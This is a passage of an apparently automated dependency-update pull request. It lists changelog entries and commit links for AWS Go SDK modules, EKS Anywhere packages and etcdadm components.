href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/ecs/CHANGELOG.md#v1250-2023-04-10\"\u003ev1.25.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds support for enabling FIPS compliance on Amazon ECS Fargate tasks\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/marketplacecatalog\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/marketplacecatalog/CHANGELOG.md#v1160-2023-04-10\"\u003ev1.16.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Added three new APIs to support resource sharing: GetResourcePolicy, PutResourcePolicy, and DeleteResourcePolicy. Added new OwnershipType field to ListEntities request to let users filter on entities that are shared with them. Increased max page size of ListEntities response from 20 to 50 results.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/mediaconvert\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/mediaconvert/CHANGELOG.md#v1350-2023-04-10\"\u003ev1.35.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: AWS Elemental MediaConvert SDK now supports conversion of 608 paint-on captions to pop-on captions for SCC sources.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/omics\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/omics/CHANGELOG.md#v130-2023-04-10\"\u003ev1.3.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Remove unexpected API changes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/rekognition\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/rekognition/CHANGELOG.md#v1240-2023-04-10\"\u003ev1.24.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds support for Face Liveness APIs in Amazon Rekognition. Updates UpdateStreamProcessor to return ResourceInUseException Exception. Minor updates to API documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-04-07)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/dlm\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/dlm/CHANGELOG.md#v1150-2023-04-07\"\u003ev1.15.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAnnouncement\u003c/strong\u003e: This release includes breaking changes for the timestamp trait on the data lifecycle management client.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Updated timestamp format for GetLifecyclePolicy API\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Correct timestamp type for data lifecycle manager.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/docdb\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/docdb/CHANGELOG.md#v1210-2023-04-07\"\u003ev1.21.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a new parameter 'DBClusterParameterGroupName' to 'RestoreDBClusterFromSnapshot' API to associate the name of the DB cluster parameter group while performing restore.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/fsx\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/fsx/CHANGELOG.md#v1288-2023-04-07\"\u003ev1.28.8\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Amazon FSx for Lustre now supports creating data repository associations on Persistent_1 and Scratch_2 file systems.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/lambda\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/lambda/CHANGELOG.md#v1310-2023-04-07\"\u003ev1.31.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a new Lambda InvokeWithResponseStream API to support streaming Lambda function responses. The release also adds a new InvokeMode parameter to Function Url APIs to control whether the response will be streamed or buffered.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/quicksight\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/quicksight/CHANGELOG.md#v1340-2023-04-07\"\u003ev1.34.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release has two changes: adding the OR condition to tag-based RLS rules in CreateDataSet and UpdateDataSet; adding RefreshSchedule and Incremental RefreshProperties operations for users to programmatically configure SPICE dataset ingestions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/redshiftdata\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/redshiftdata/CHANGELOG.md#v1193-2023-04-07\"\u003ev1.19.3\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Update documentation of API descriptions as needed in support of temporary credentials with IAM identity.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/servicecatalog\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/servicecatalog/CHANGELOG.md#v1181-2023-04-07\"\u003ev1.18.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Updates description for property\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-04-06)\u003c/h1\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/cloudformation\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/cloudformation/CHANGELOG.md#v1270-2023-04-06\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Including UPDATE_COMPLETE as a failed status for DeleteStack waiter.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/greengrassv2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/greengrassv2/CHANGELOG.md#v1220-2023-04-06\"\u003ev1.22.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for SUCCEEDED value in coreDeviceExecutionStatus field. Documentation updates for Greengrass V2.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/proton\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/proton/CHANGELOG.md#v1210-2023-04-06\"\u003ev1.21.0\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fcc0f5daa41033b7a696f8cc5f53a9fc8696a274\"\u003e\u003ccode\u003efcc0f5d\u003c/code\u003e\u003c/a\u003e Release 2023-04-10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/cd750e0b2188951c525ae7917d47ae9e2d013a1b\"\u003e\u003ccode\u003ecd750e0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1bc2f0514c73be727d3536e829fef18911bb45ae\"\u003e\u003ccode\u003e1bc2f05\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b964f5ca3ccae40ef8d7a56fd1b1ad040764b5fa\"\u003e\u003ccode\u003eb964f5c\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fd6901588c6d13a7889787328d0628134afd14cc\"\u003e\u003ccode\u003efd69015\u003c/code\u003e\u003c/a\u003e fix APIGW exports nullability exceptions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fae239abb72a392c50e05aa567b2e5cc2b93a10b\"\u003e\u003ccode\u003efae239a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2089\"\u003e#2089\u003c/a\u003e from aws/auditAccessibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/acf33a2872dbd9d3547842f38ccd38863048c121\"\u003e\u003ccode\u003eacf33a2\u003c/code\u003e\u003c/a\u003e Update aws-sdk-go-v2's comment codegened from Smithy Go's updated document sm...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/27360c189034eb456ebe7458bb8e019bc45d686c\"\u003e\u003ccode\u003e27360c1\u003c/code\u003e\u003c/a\u003e fix APIGW exports nullability exceptions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/30383d567f67c2a67b2b40a462a8c284c49d1796\"\u003e\u003ccode\u003e30383d5\u003c/code\u003e\u003c/a\u003e Release 2023-04-07\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/352f89c2d23ec6249a699c732ba5c9ae050f833f\"\u003e\u003ccode\u003e352f89c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.15.3...config/v1.18.21\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.167.1 to 1.296.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e4deb657ddb9c5d8ac36c335391aafb19034e9de\"\u003e\u003ccode\u003ee4deb65\u003c/code\u003e\u003c/a\u003e Release 2026-03-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1f758f207351302f9f4e1a2aa4c255a75d81446b\"\u003e\u003ccode\u003e1f758f2\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ba7e432545fa3203d98f593b2aceaba66c02db7a\"\u003e\u003ccode\u003eba7e432\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/607cb0afad6e6a655a356be54f9fdec5cc558a80\"\u003e\u003ccode\u003e607cb0a\u003c/code\u003e\u003c/a\u003e Release 2026-03-30\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a44005fd4a2e2b7308c0346da970890757aaeda5\"\u003e\u003ccode\u003ea44005f\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dbbd8465f03f1931d85d38af45f18362cbc4c469\"\u003e\u003ccode\u003edbbd846\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5b5c3f960e98cf024a8b7d6a6a8f0a1452e028fa\"\u003e\u003ccode\u003e5b5c3f9\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;drop service/internal/benchmark (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3368\"\u003e#3368\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3369\"\u003e#3369\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7ca3f9d52a718e4be3a78be0d05e6437ae362e20\"\u003e\u003ccode\u003e7ca3f9d\u003c/code\u003e\u003c/a\u003e drop service/internal/benchmark (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3368\"\u003e#3368\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/338088bc3ce801d773863578da6a0a835d6012af\"\u003e\u003ccode\u003e338088b\u003c/code\u003e\u003c/a\u003e Release 2026-03-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f0e5f3dc09ddb548bccfc11b297229839516bff9\"\u003e\u003ccode\u003ef0e5f3d\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.167.1...service/ec2/v1.296.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ecr` from 1.27.4 to 1.56.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5a964704cb2640ed57a74b9b37a53dcda7b6b7dd\"\u003e\u003ccode\u003e5a96470\u003c/code\u003e\u003c/a\u003e Release 2024-12-19\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/653aa807b912e104f5e1e84e0510b4dffd76c751\"\u003e\u003ccode\u003e653aa80\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d02b239e896c5791e295c9a30a5281f56a8f7c39\"\u003e\u003ccode\u003ed02b239\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/698d709c21bc7922489aaba8c8207c9d7253c2fe\"\u003e\u003ccode\u003e698d709\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/885de40869f9bcee29ad11d60967aa0f1b571d46\"\u003e\u003ccode\u003e885de40\u003c/code\u003e\u003c/a\u003e Fix improper use of Printf-style functions (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2934\"\u003e#2934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/858298a55393392fb161c5bd0ae3b9c5251996bf\"\u003e\u003ccode\u003e858298a\u003c/code\u003e\u003c/a\u003e Release 2024-12-18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f58264af808a255782999422056bccb06552dcbd\"\u003e\u003ccode\u003ef58264a\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/df31082d87044a000a1524dbb654651f32713e10\"\u003e\u003ccode\u003edf31082\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/346690ed8f5b974ab26532aa93d5fa92a58d3571\"\u003e\u003ccode\u003e346690e\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/45154546e09b48505c8798f7e5f3846ee1e0453a\"\u003e\u003ccode\u003e4515454\u003c/code\u003e\u003c/a\u003e Release 2024-12-17\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.27.4...service/ssm/v1.56.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/eks-anywhere-packages` from 0.4.5 to 0.4.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/eks-anywhere-packages/releases\"\u003egithub.com/aws/eks-anywhere-packages's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.14.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd registry mirror support for curated packages\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNew Command: \u003ccode\u003eeksctl anywhere copy packages\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere/pull/4420\"\u003eaws/eks-anywhere#4420\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Create Namespace during package creation.\u003c/li\u003e\n\u003cli\u003eAdded Harbor support for import/download images command to EKS-A Packages.\u003c/li\u003e\n\u003cli\u003eFixed bug where PackageBundle version was incremented without changes sometimes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Prometheus Package\u003c/li\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Emissary for improved upgrade flow, and support multiple instances of the package.\u003c/li\u003e\n\u003cli\u003eUpdated Emissary Package to version 3.3.0\u003c/li\u003e\n\u003cli\u003eUpdated Metallb Package to version to 0.13.7\nUpdated ADOT Package to version 0.23.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003ch2\u003eGeneral\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved to Go version 1.18\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd EKS Anywhere Packages support for remote management on workload clusters.\u003c/li\u003e\n\u003cli\u003eFixed Update Available not showing on PackageBundle list.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Metallb for improved upgrade flow\u003c/li\u003e\n\u003cli\u003eAdded Cert Manager Package\u003c/li\u003e\n\u003cli\u003eAdded AWS Distro for OpenTelemetry Package (ADOT)\u003c/li\u003e\n\u003cli\u003eAdded Metrics Server Package\u003c/li\u003e\n\u003cli\u003eAdded Cluster Autoscaler Package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded webhook to provide schema validation for packages\u003c/li\u003e\n\u003cli\u003eAdded support for gated packages\u003c/li\u003e\n\u003cli\u003eAdded active bundle validation for packagebundles\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport for configurations from \u003ccode\u003egenerate packages\u003c/code\u003e has been removed\u003c/li\u003e\n\u003cli\u003eSupport for gated packages\u003c/li\u003e\n\u003cli\u003eRemoved feature flag from curated packages installation\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Emmisary package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.10.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eController\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for configurations, and images in PackageBundle.\u003c/li\u003e\n\u003cli\u003eRemove registry from PackageBundle and updates sourceRegistry during cluster creation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/afbcc9b196cf4d5988ddfb8f0133a2c1821821eb\"\u003e\u003ccode\u003eafbcc9b\u003c/code\u003e\u003c/a\u003e Faster retries during initial ecr credential injection (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1262\"\u003e#1262\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/01d4d5aff3e12dd6cc645cdb4126b8f2f5b8233c\"\u003e\u003ccode\u003e01d4d5a\u003c/code\u003e\u003c/a\u003e skip validation for package controller package (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1261\"\u003e#1261\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/317ca7eac8e949690a10dc6e8ec9e3b24f6a4a67\"\u003e\u003ccode\u003e317ca7e\u003c/code\u003e\u003c/a\u003e Revert pkg-ctlr cert private key rotation policy to Never (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1260\"\u003e#1260\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/b0bccf64eec3527271e4fa70616b39a6ff33b816\"\u003e\u003ccode\u003eb0bccf6\u003c/code\u003e\u003c/a\u003e Bump dev bundle to latest versions (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1259\"\u003e#1259\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/583ffe25a954c7b963108009cdcd24ff5cbf8047\"\u003e\u003ccode\u003e583ffe2\u003c/code\u003e\u003c/a\u003e Adds support for k8s 1.35 (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1258\"\u003e#1258\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/8c8da0328998e796b813e417ed5e720474802ff2\"\u003e\u003ccode\u003e8c8da03\u003c/code\u003e\u003c/a\u003e Update prod bundle for package release (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1257\"\u003e#1257\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/cfdc201fb58fc4c76b411a0ddeab291e82a4d0a3\"\u003e\u003ccode\u003ecfdc201\u003c/code\u003e\u003c/a\u003e fix adot regression (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1256\"\u003e#1256\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/aba2972a0d9bae8bdfc9eec8160b2d0eeef7c005\"\u003e\u003ccode\u003eaba2972\u003c/code\u003e\u003c/a\u003e Staging bundle with pkg ctlr fix (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1255\"\u003e#1255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/47ceca1fb64f400921691bd097e482bd5b881746\"\u003e\u003ccode\u003e47ceca1\u003c/code\u003e\u003c/a\u003e fix imagePullSecret schema validation (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1254\"\u003e#1254\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/5c41ff81f07899eae8a27ed0cb629d28a96585f2\"\u003e\u003ccode\u003e5c41ff8\u003c/code\u003e\u003c/a\u003e Staging bundle with fixed packages (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1253\"\u003e#1253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/eks-anywhere-packages/compare/v0.4.5...v0.4.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-bootstrap-provider` from 1.0.17 to 1.0.19\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/a4b92b3f82826f1c85f473692d35e5311b04c7c4\"\u003e\u003ccode\u003ea4b92b3\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/50\"\u003e#50\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/2ee5467f5dc9940d86a4f1885e3f1612a8d1272e\"\u003e\u003ccode\u003e2ee5467\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/51\"\u003e#51\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/e288bc1b6cd8867c52ae3da79bfb153913534f19\"\u003e\u003ccode\u003ee288bc1\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcdadm bootstrap mana...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/compare/v1.0.17...v1.0.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-controller` from 1.0.25 to 1.0.27\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/6795a4f86df4078f5258a25005028c6660fc36c8\"\u003e\u003ccode\u003e6795a4f\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/75\"\u003e#75\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/72e7e5a190206423cea4519449b08a9c200971d4\"\u003e\u003ccode\u003e72e7e5a\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/74\"\u003e#74\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 